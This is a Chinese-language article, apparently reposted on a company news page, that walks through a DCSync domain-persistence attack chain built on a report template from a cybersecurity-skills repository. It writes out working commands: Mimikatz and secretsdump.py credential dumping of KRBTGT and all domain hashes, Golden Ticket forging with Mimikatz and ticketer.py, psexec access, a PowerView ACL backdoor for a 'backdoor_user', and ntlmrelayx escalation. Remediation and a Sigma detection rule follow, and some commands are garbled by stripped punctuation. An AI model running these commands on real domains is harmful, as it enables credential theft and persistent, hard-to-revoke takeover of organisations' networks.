ARTICLE DETAIL

资讯详情

深耕郑州网站建设与运营推广的一线实战洞察。

使用 DCSync 报告模板构建域持久化攻击链:从凭据提取到 Golden Ticket 的实战指南

使用 DCSync 报告模板构建域持久化攻击链:从凭据提取到 Golden Ticket 的实战指南 使用 DCSync 报告模板构建域持久化攻击链从凭据提取到 Golden Ticket 的实战指南【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATTCK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI 20 platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills本指南以 Anthropic-Cybersecurity-Skills 仓库中conducting-domain-persistence-with-dcsync技能附带的 DCSync 攻击报告模板 为骨架完整展开 DCSync 攻击的四个核心环节目标域信息记录、凭据提取、持久化机制确认与修复建议。读者完成阅读后将掌握一套可直接复制到授权红队评估中的攻击流程——包括如何枚举具备复制权限的账户、用 Mimikatz 与 Impacket 执行 DCSync、伪造 Golden Ticket以及如何用仓库配套的检测脚本与报告模板沉淀完整证据链。为什么需要一份 DCSync 攻击报告模板DCSync 是滥用 Microsoft 目录复制服务远程协议MS-DRSR的攻击技术攻击者伪装成域控制器DC向目标 DC 请求密码数据。该技术由 Mimikatz 作者 Benjamin Delpy 与 Vincent Le Toux 提出其核心是利用DS-Replication-Get-Changes与DS-Replication-Get-Changes-All两项扩展权限。任何持有这些权限的主体用户或计算机账户都能复制域内任意账户的密码哈希包括 KRBTGT 账户——拿到 KRBTGT 哈希即可伪造 Golden Ticket实现无期限的域持久化。该技术被归类为 MITRE ATTCK T1003.006是 APT28Fancy Bear、APT29Cozy Bear、FIN6 等组织常用的后渗透手段依据 SKILL.md。在授权评估中攻击成功不等于任务完成。红队需要把攻击链条、凭据、持久化机制、检测盲区与修复建议沉淀为结构化记录才能支撑后续报告编写、紫队检测验证与客户修复。这正是模板存在的价值四张表分别回答打的是哪、拿到了什么、凭什么持久、怎么修。模板全景四张表构成完整攻击闭环模板template.md共四部分部分记录内容对应攻击阶段Target Domain域、域 SID、DC 目标、攻击源账户、所用工具侦察与执行Extracted Credentials账户、类型、NT Hash、明文、持久化价值凭据提取Persistence MechanismsGolden Ticket / DCSync 权限 / Silver Ticket 状态持久化建立Remediation修复动作与优先级收尾与移交下面逐表结合实操展开。第一部分Target Domain —— 记录攻击上下文模板要求记录五个字段Domain目标域、Domain SID域 SID伪造 Golden Ticket 的必需参数、DC Target目标域控制器、Attack Source Account攻击源账户、Tool Used工具默认 Mimikatz / secretsdump.py。域 SID 与 KRBTGT 哈希是 Golden Ticket 的两个核心输入。伪造时 Mimikatz 需要完整的S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX格式因此务必在此处留存避免后续补查。工具选择上Windows 侧用 Mimikatz 的lsadump::dcsyncLinux 侧用 Impacket 的secretsdump.py两者攻击效果等价区别在于运行平台与执行环境见 SKILL.md 的完整命令。第二部分Extracted Credentials —— 凭据的优先级排序模板将凭据分为四类并标注其持久化价值账户类型持久化价值krbtgt服务账户无明文Golden Ticket域内无期限访问Administrator域管理员无明文直接 DA 访问扩展来看依据 SKILL.md 的Critical Hashes to Extract表完整提取策略还包含服务账户哈希用于域内横向移动计算机账户哈希用于伪造 Silver Ticket实现服务级身份冒充。提取命令如下# 提取 KRBTGTGolden Ticket 关键 mimikatz.exe lsadump::dcsync /domain:domain.local /user:krbtgt # 提取域管理员 mimikatz.exe lsadump::dcsync /domain:domain.local /user:administrator # 导出全部域账户CSV 格式 mimikatz.exe lsadump::dcsync /domain:domain.local /all /csvLinux 侧 secretsdump.py 的等价操作# 导出全部凭据 secretsdump.py domain.local/admin:Password12310.10.10.1 # 仅导出指定用户 secretsdump.py -just-dc-user krbtgt domain.local/admin:Password12310.10.10.1 # 仅导出 NTLM 哈希不含 Kerberos 密钥 secretsdump.py -just-dc-ntlm domain.local/admin:Password12310.10.10.1 # 使用 Kerberos 票据认证无密码 export KRB5CCNAMEadmin.ccache secretsdump.py -k -no-pass domain.local/adminDC01.domain.local源码支撑secretsdump 输出的自动化解析仓库配套脚本 process.py 专门解析 secretsdump.py 输出它通过正则^(.?):([\d]):([a-fA-F0-9]{32}):([a-fA-F0-9]{32}):::匹配 NTDS 哈希行提取用户名、RID、LM 哈希与 NT 哈希并自动分类以$结尾的账户归为机器账户krbtgt与administrator被单独标记为最高风险哈希CLEARTEXT:行被识别为明文密码。运行方式python3 process.py secretsdump_output.txt脚本还会输出完整的 DCSync Credential Analysis Report包含哈希总数、口令复用分析自动跳过空密码哈希31d6cfe0d16ae931b73c59d7e0c089c0、明文密码清单以及四类持久化机会提示Golden Ticket、Silver Ticket、Pass-the-Hash、离线口令破解见 process.py。这正好对应模板表中Persistence Value列的填写依据。第三部分Persistence Mechanisms —— 三种持久化手段的确认模板要求对三种持久化机制逐项打勾Golden Ticket 是否创建、DCSync 权限是否授予并记录授权账户、Silver Ticket 是否创建并记录服务。3.1 Golden Ticket用 KRBTGT 哈希换取无期限域访问拿到 KRBTGT NT 哈希后在 Windows 侧用 Mimikatz 伪造# 基础 Golden Ticket立即注入内存/ptt mimikatz.exe kerberos::golden /user:administrator /domain:domain.local \ /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX \ /krbtgt:krbtgt_ntlm_hash /ptt # 指定组归属512Domain Admins, 513Domain Users, 518Schema Admins, 519Enterprise Admins, 520Group Policy Creators Owners mimikatz.exe kerberos::golden /user:fakeadmin /domain:domain.local \ /sid:S-1-5-21-XXXXXXXXXX \ /krbtgt:krbtgt_ntlm_hash \ /groups:512,513,518,519,520 /pttLinux 侧用 Impacket ticketer.py# 创建 Golden Ticket ticketer.py -nthash krbtgt_ntlm_hash -domain-sid S-1-5-21-XXXXXXXXXX \ -domain domain.local administrator # 使用票据访问 DC export KRB5CCNAMEadministrator.ccache psexec.py -k -no-pass domain.local/administratorDC01.domain.local依据 workflows.md 的 Golden Ticket 生命周期说明票据由 KRBTGT 哈希 域 SID 生成默认具备约 10 年有效期它能扛过普通密码重置只有双重 KRBTGT 重置两次重置间隔 10 小时以上才能将其作废——这也是模板修复表中第一项动作的由来。3.2 DCSync 权限持久化把复制权限授权给受控账户比金票更隐蔽的持久化思路在域内创建一个低可见度账户并授予其DS-Replication-Get-Changes-All权限此后该账户可独立执行 DCSync。# PowerView为目标账户授予 DCSync 权限 Add-DomainObjectAcl -TargetIdentity DCdomain,DClocal \ -PrincipalIdentity backdoor_user -Rights DCSync # 验证权限已生效 Get-DomainObjectAcl -SearchBase DCdomain,DClocal -ResolveGUIDs | Where-Object { $_.SecurityIdentifier -match backdoor_user_SID }也可用 ntlmrelayx.py 通过中继自动完成权限提升ntlmrelayx.py -t ldap://DC01.domain.local --escalate-user backdoor_user3.3 源码支撑用 ldap3 审计复制权限持有者仓库的 agent.py 实现了权限审计的自动化它通过 ldap3 以 NTLM 绑定域控先查询域对象的nTSecurityDescriptor再用adminCount1过滤器枚举高权限用户标记出潜在的 DCSync 权限持有者。python3 agent.py --server DC_IP --domain corp.local \ --username bind_user --password pass [--log-file events.json] [--output report.json]其底层依赖见 api-reference.md及安装方式库安装用途ldap3pip install ldap3AD 目录查询权限枚举impacketpip install impacketsecretsdump.py 等网络协议工具pyadpip install pyadWindows 侧 AD 接口检测 DCSync 的三个关键复制 GUID 定义在 agent.py 与 process.pyGUID权限1131f6aa-9c07-11d1-f79f-00c04fc2dcd2DS-Replication-Get-Changes1131f6ad-9c07-11d1-f79f-00c04fc2dcd2DS-Replication-Get-Changes-All89e95b76-444d-4c62-991a-0facbeda640cDS-Replication-Get-Changes-In-Filtered-Set3.4 攻击链全景依据 workflows.md 的完整攻击链1. 前置条件 ├── 域管理员或具备复制权限的账户 ├── 到域控的网络可达TCP/135动态 RPC └── 工具MimikatzWindows或 secretsdump.pyLinux 2. 凭据提取 ├── 提取 KRBTGT 哈希Golden Ticket 能力 ├── 提取 Administrator 哈希即时 DA 访问 ├── 提取全部域哈希完整转储 └── 提取服务账户哈希横向移动 3. Golden Ticket 持久化 ├── 用 KRBTGT 哈希伪造金票 ├── 自定义用户、SID 与组归属 ├── 导入当前会话 └── 访问域内任意资源 4. DCSync 权限持久化 ├── 在 AD 中创建低可见度账户 ├── 授予 DS-Replication-Get-Changes-All 权限 ├── 用 ACL 枚举验证权限 └── 该账户可独立执行 DCSync第四部分Remediation —— 收尾移交与修复优先级模板的修复表给出了四项动作与优先级动作优先级双重 KRBTGT 密码重置两次间隔 10 小时Critical审计具备复制权限的账户Critical为复制 GUID 启用 Event 4662 日志High部署 DRSUAPI 流量监控High双重重置的间隔要求有明确依据域内每台 DC 都会缓存 KRBTGT 密码的历史版本以处理复制延迟若两次重置间隔太短攻击者仍可用旧哈希伪造票据因此两次重置之间必须留出至少 10 小时的复制收敛窗口见 workflows.md。检测签名让报告中的证据可验证模板的修复环节离不开检测验证。SKILL.md 的 Detection Signatures 表提供了五类可落地的检测指标SKILL.md指标检测方法来自非 DC 源的 DrsGetNCChanges RPC 调用监控 DRSUAPI 流量来源 IP含 Replicating Directory Changes GUID 的 Event 4662DC 上 Windows 安全日志1131f6aa-/1131f6ad- GUID带 Golden Ticket 异常的 Event 4624不可能存在的 SID 或不存在用户的登录事件域根对象 ACL 修改Event 5136目录服务变更复制流量突增网络基线偏差监控仓库 agent.py 的detect_dcsync_events函数可直接消费 JSON 格式的事件日志导出命中 4662/4624 事件中的复制 GUID 时标记为 CRITICAL其generate_sigma_rule函数还会生成生产级 Sigma 检测规则{ title: DCSync Attack Detected via Directory Replication, detection: { selection: {EventID: 4662, Properties|contains: [ 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2, 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2]}, filter: {SubjectUserName|endswith: $}, condition: selection and not filter }, level: critical, tags: [attack.credential_access, attack.t1003.006] }这条规则的完整实现见 agent.py其中以用户名不以$结尾过滤掉 DC 自身的正常复制行为是区分合法复制与攻击的关键逻辑。验证标准报告交付前的自检清单模板最终应服务于交付。SKILL.md 的 Validation CriteriaSKILL.md提供了 8 项自检具备 DCSync 权限的账户已枚举通过 DCSync 提取到 KRBTGT 哈希全部域凭据成功转储Golden Ticket 已伪造并验证 DA 访问DCSync 权限持久化机制已建立若在范围内用 Golden Ticket 验证了对域控的访问证据已记录哈希值与时间戳已提供修复建议双重 KRBTGT 重置、ACL 审计从模板到实战完整使用流程综合模板四张表与仓库配套资源一次规范化的 DCSync 持久化评估应遵循侦察用 PowerView / BloodHound CypherMATCH (u)-[:DCSync|GetChanges|GetChangesAll*1..]-(d:Domain) RETURN u.name, d.name或findDelegation.py枚举复制权限持有者默认关注 Domain Admins、Enterprise Admins、Domain Controllers 组、DC 上的 SYSTEM见 SKILL.md提取Mimikatz 或 secretsdump.py 提取凭据process.py自动解析与归类持久化伪造 Golden TicketMimikatz / ticketer.py或授予受控账户 DCSync 权限检测验证agent.py分析事件日志、生成 Sigma 规则确认检测盲区填表交付将上述结果按模板四张表结构化输出附哈希值、时间戳与修复优先级。该技能在仓库中映射到 MITRE ATTCK 的多个技术节点见 mappings/attack-navigator-layer.json 中 T1003.006、T1558.001、T1098 等相关条目并关联 NIST CSF 的 ID.RA-01 / GV.OV-02 / DE.AE-07 与 D3FEND 的网络流量分析、平台监控等防御技术见 SKILL.md。红队成员可将其作为攻击执行的脚手架蓝队则可用同一套命令与脚本反向验证检测覆盖面——这正是本模板与配套脚本的完整价值所在。【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATTCK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI 20 platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
返回列表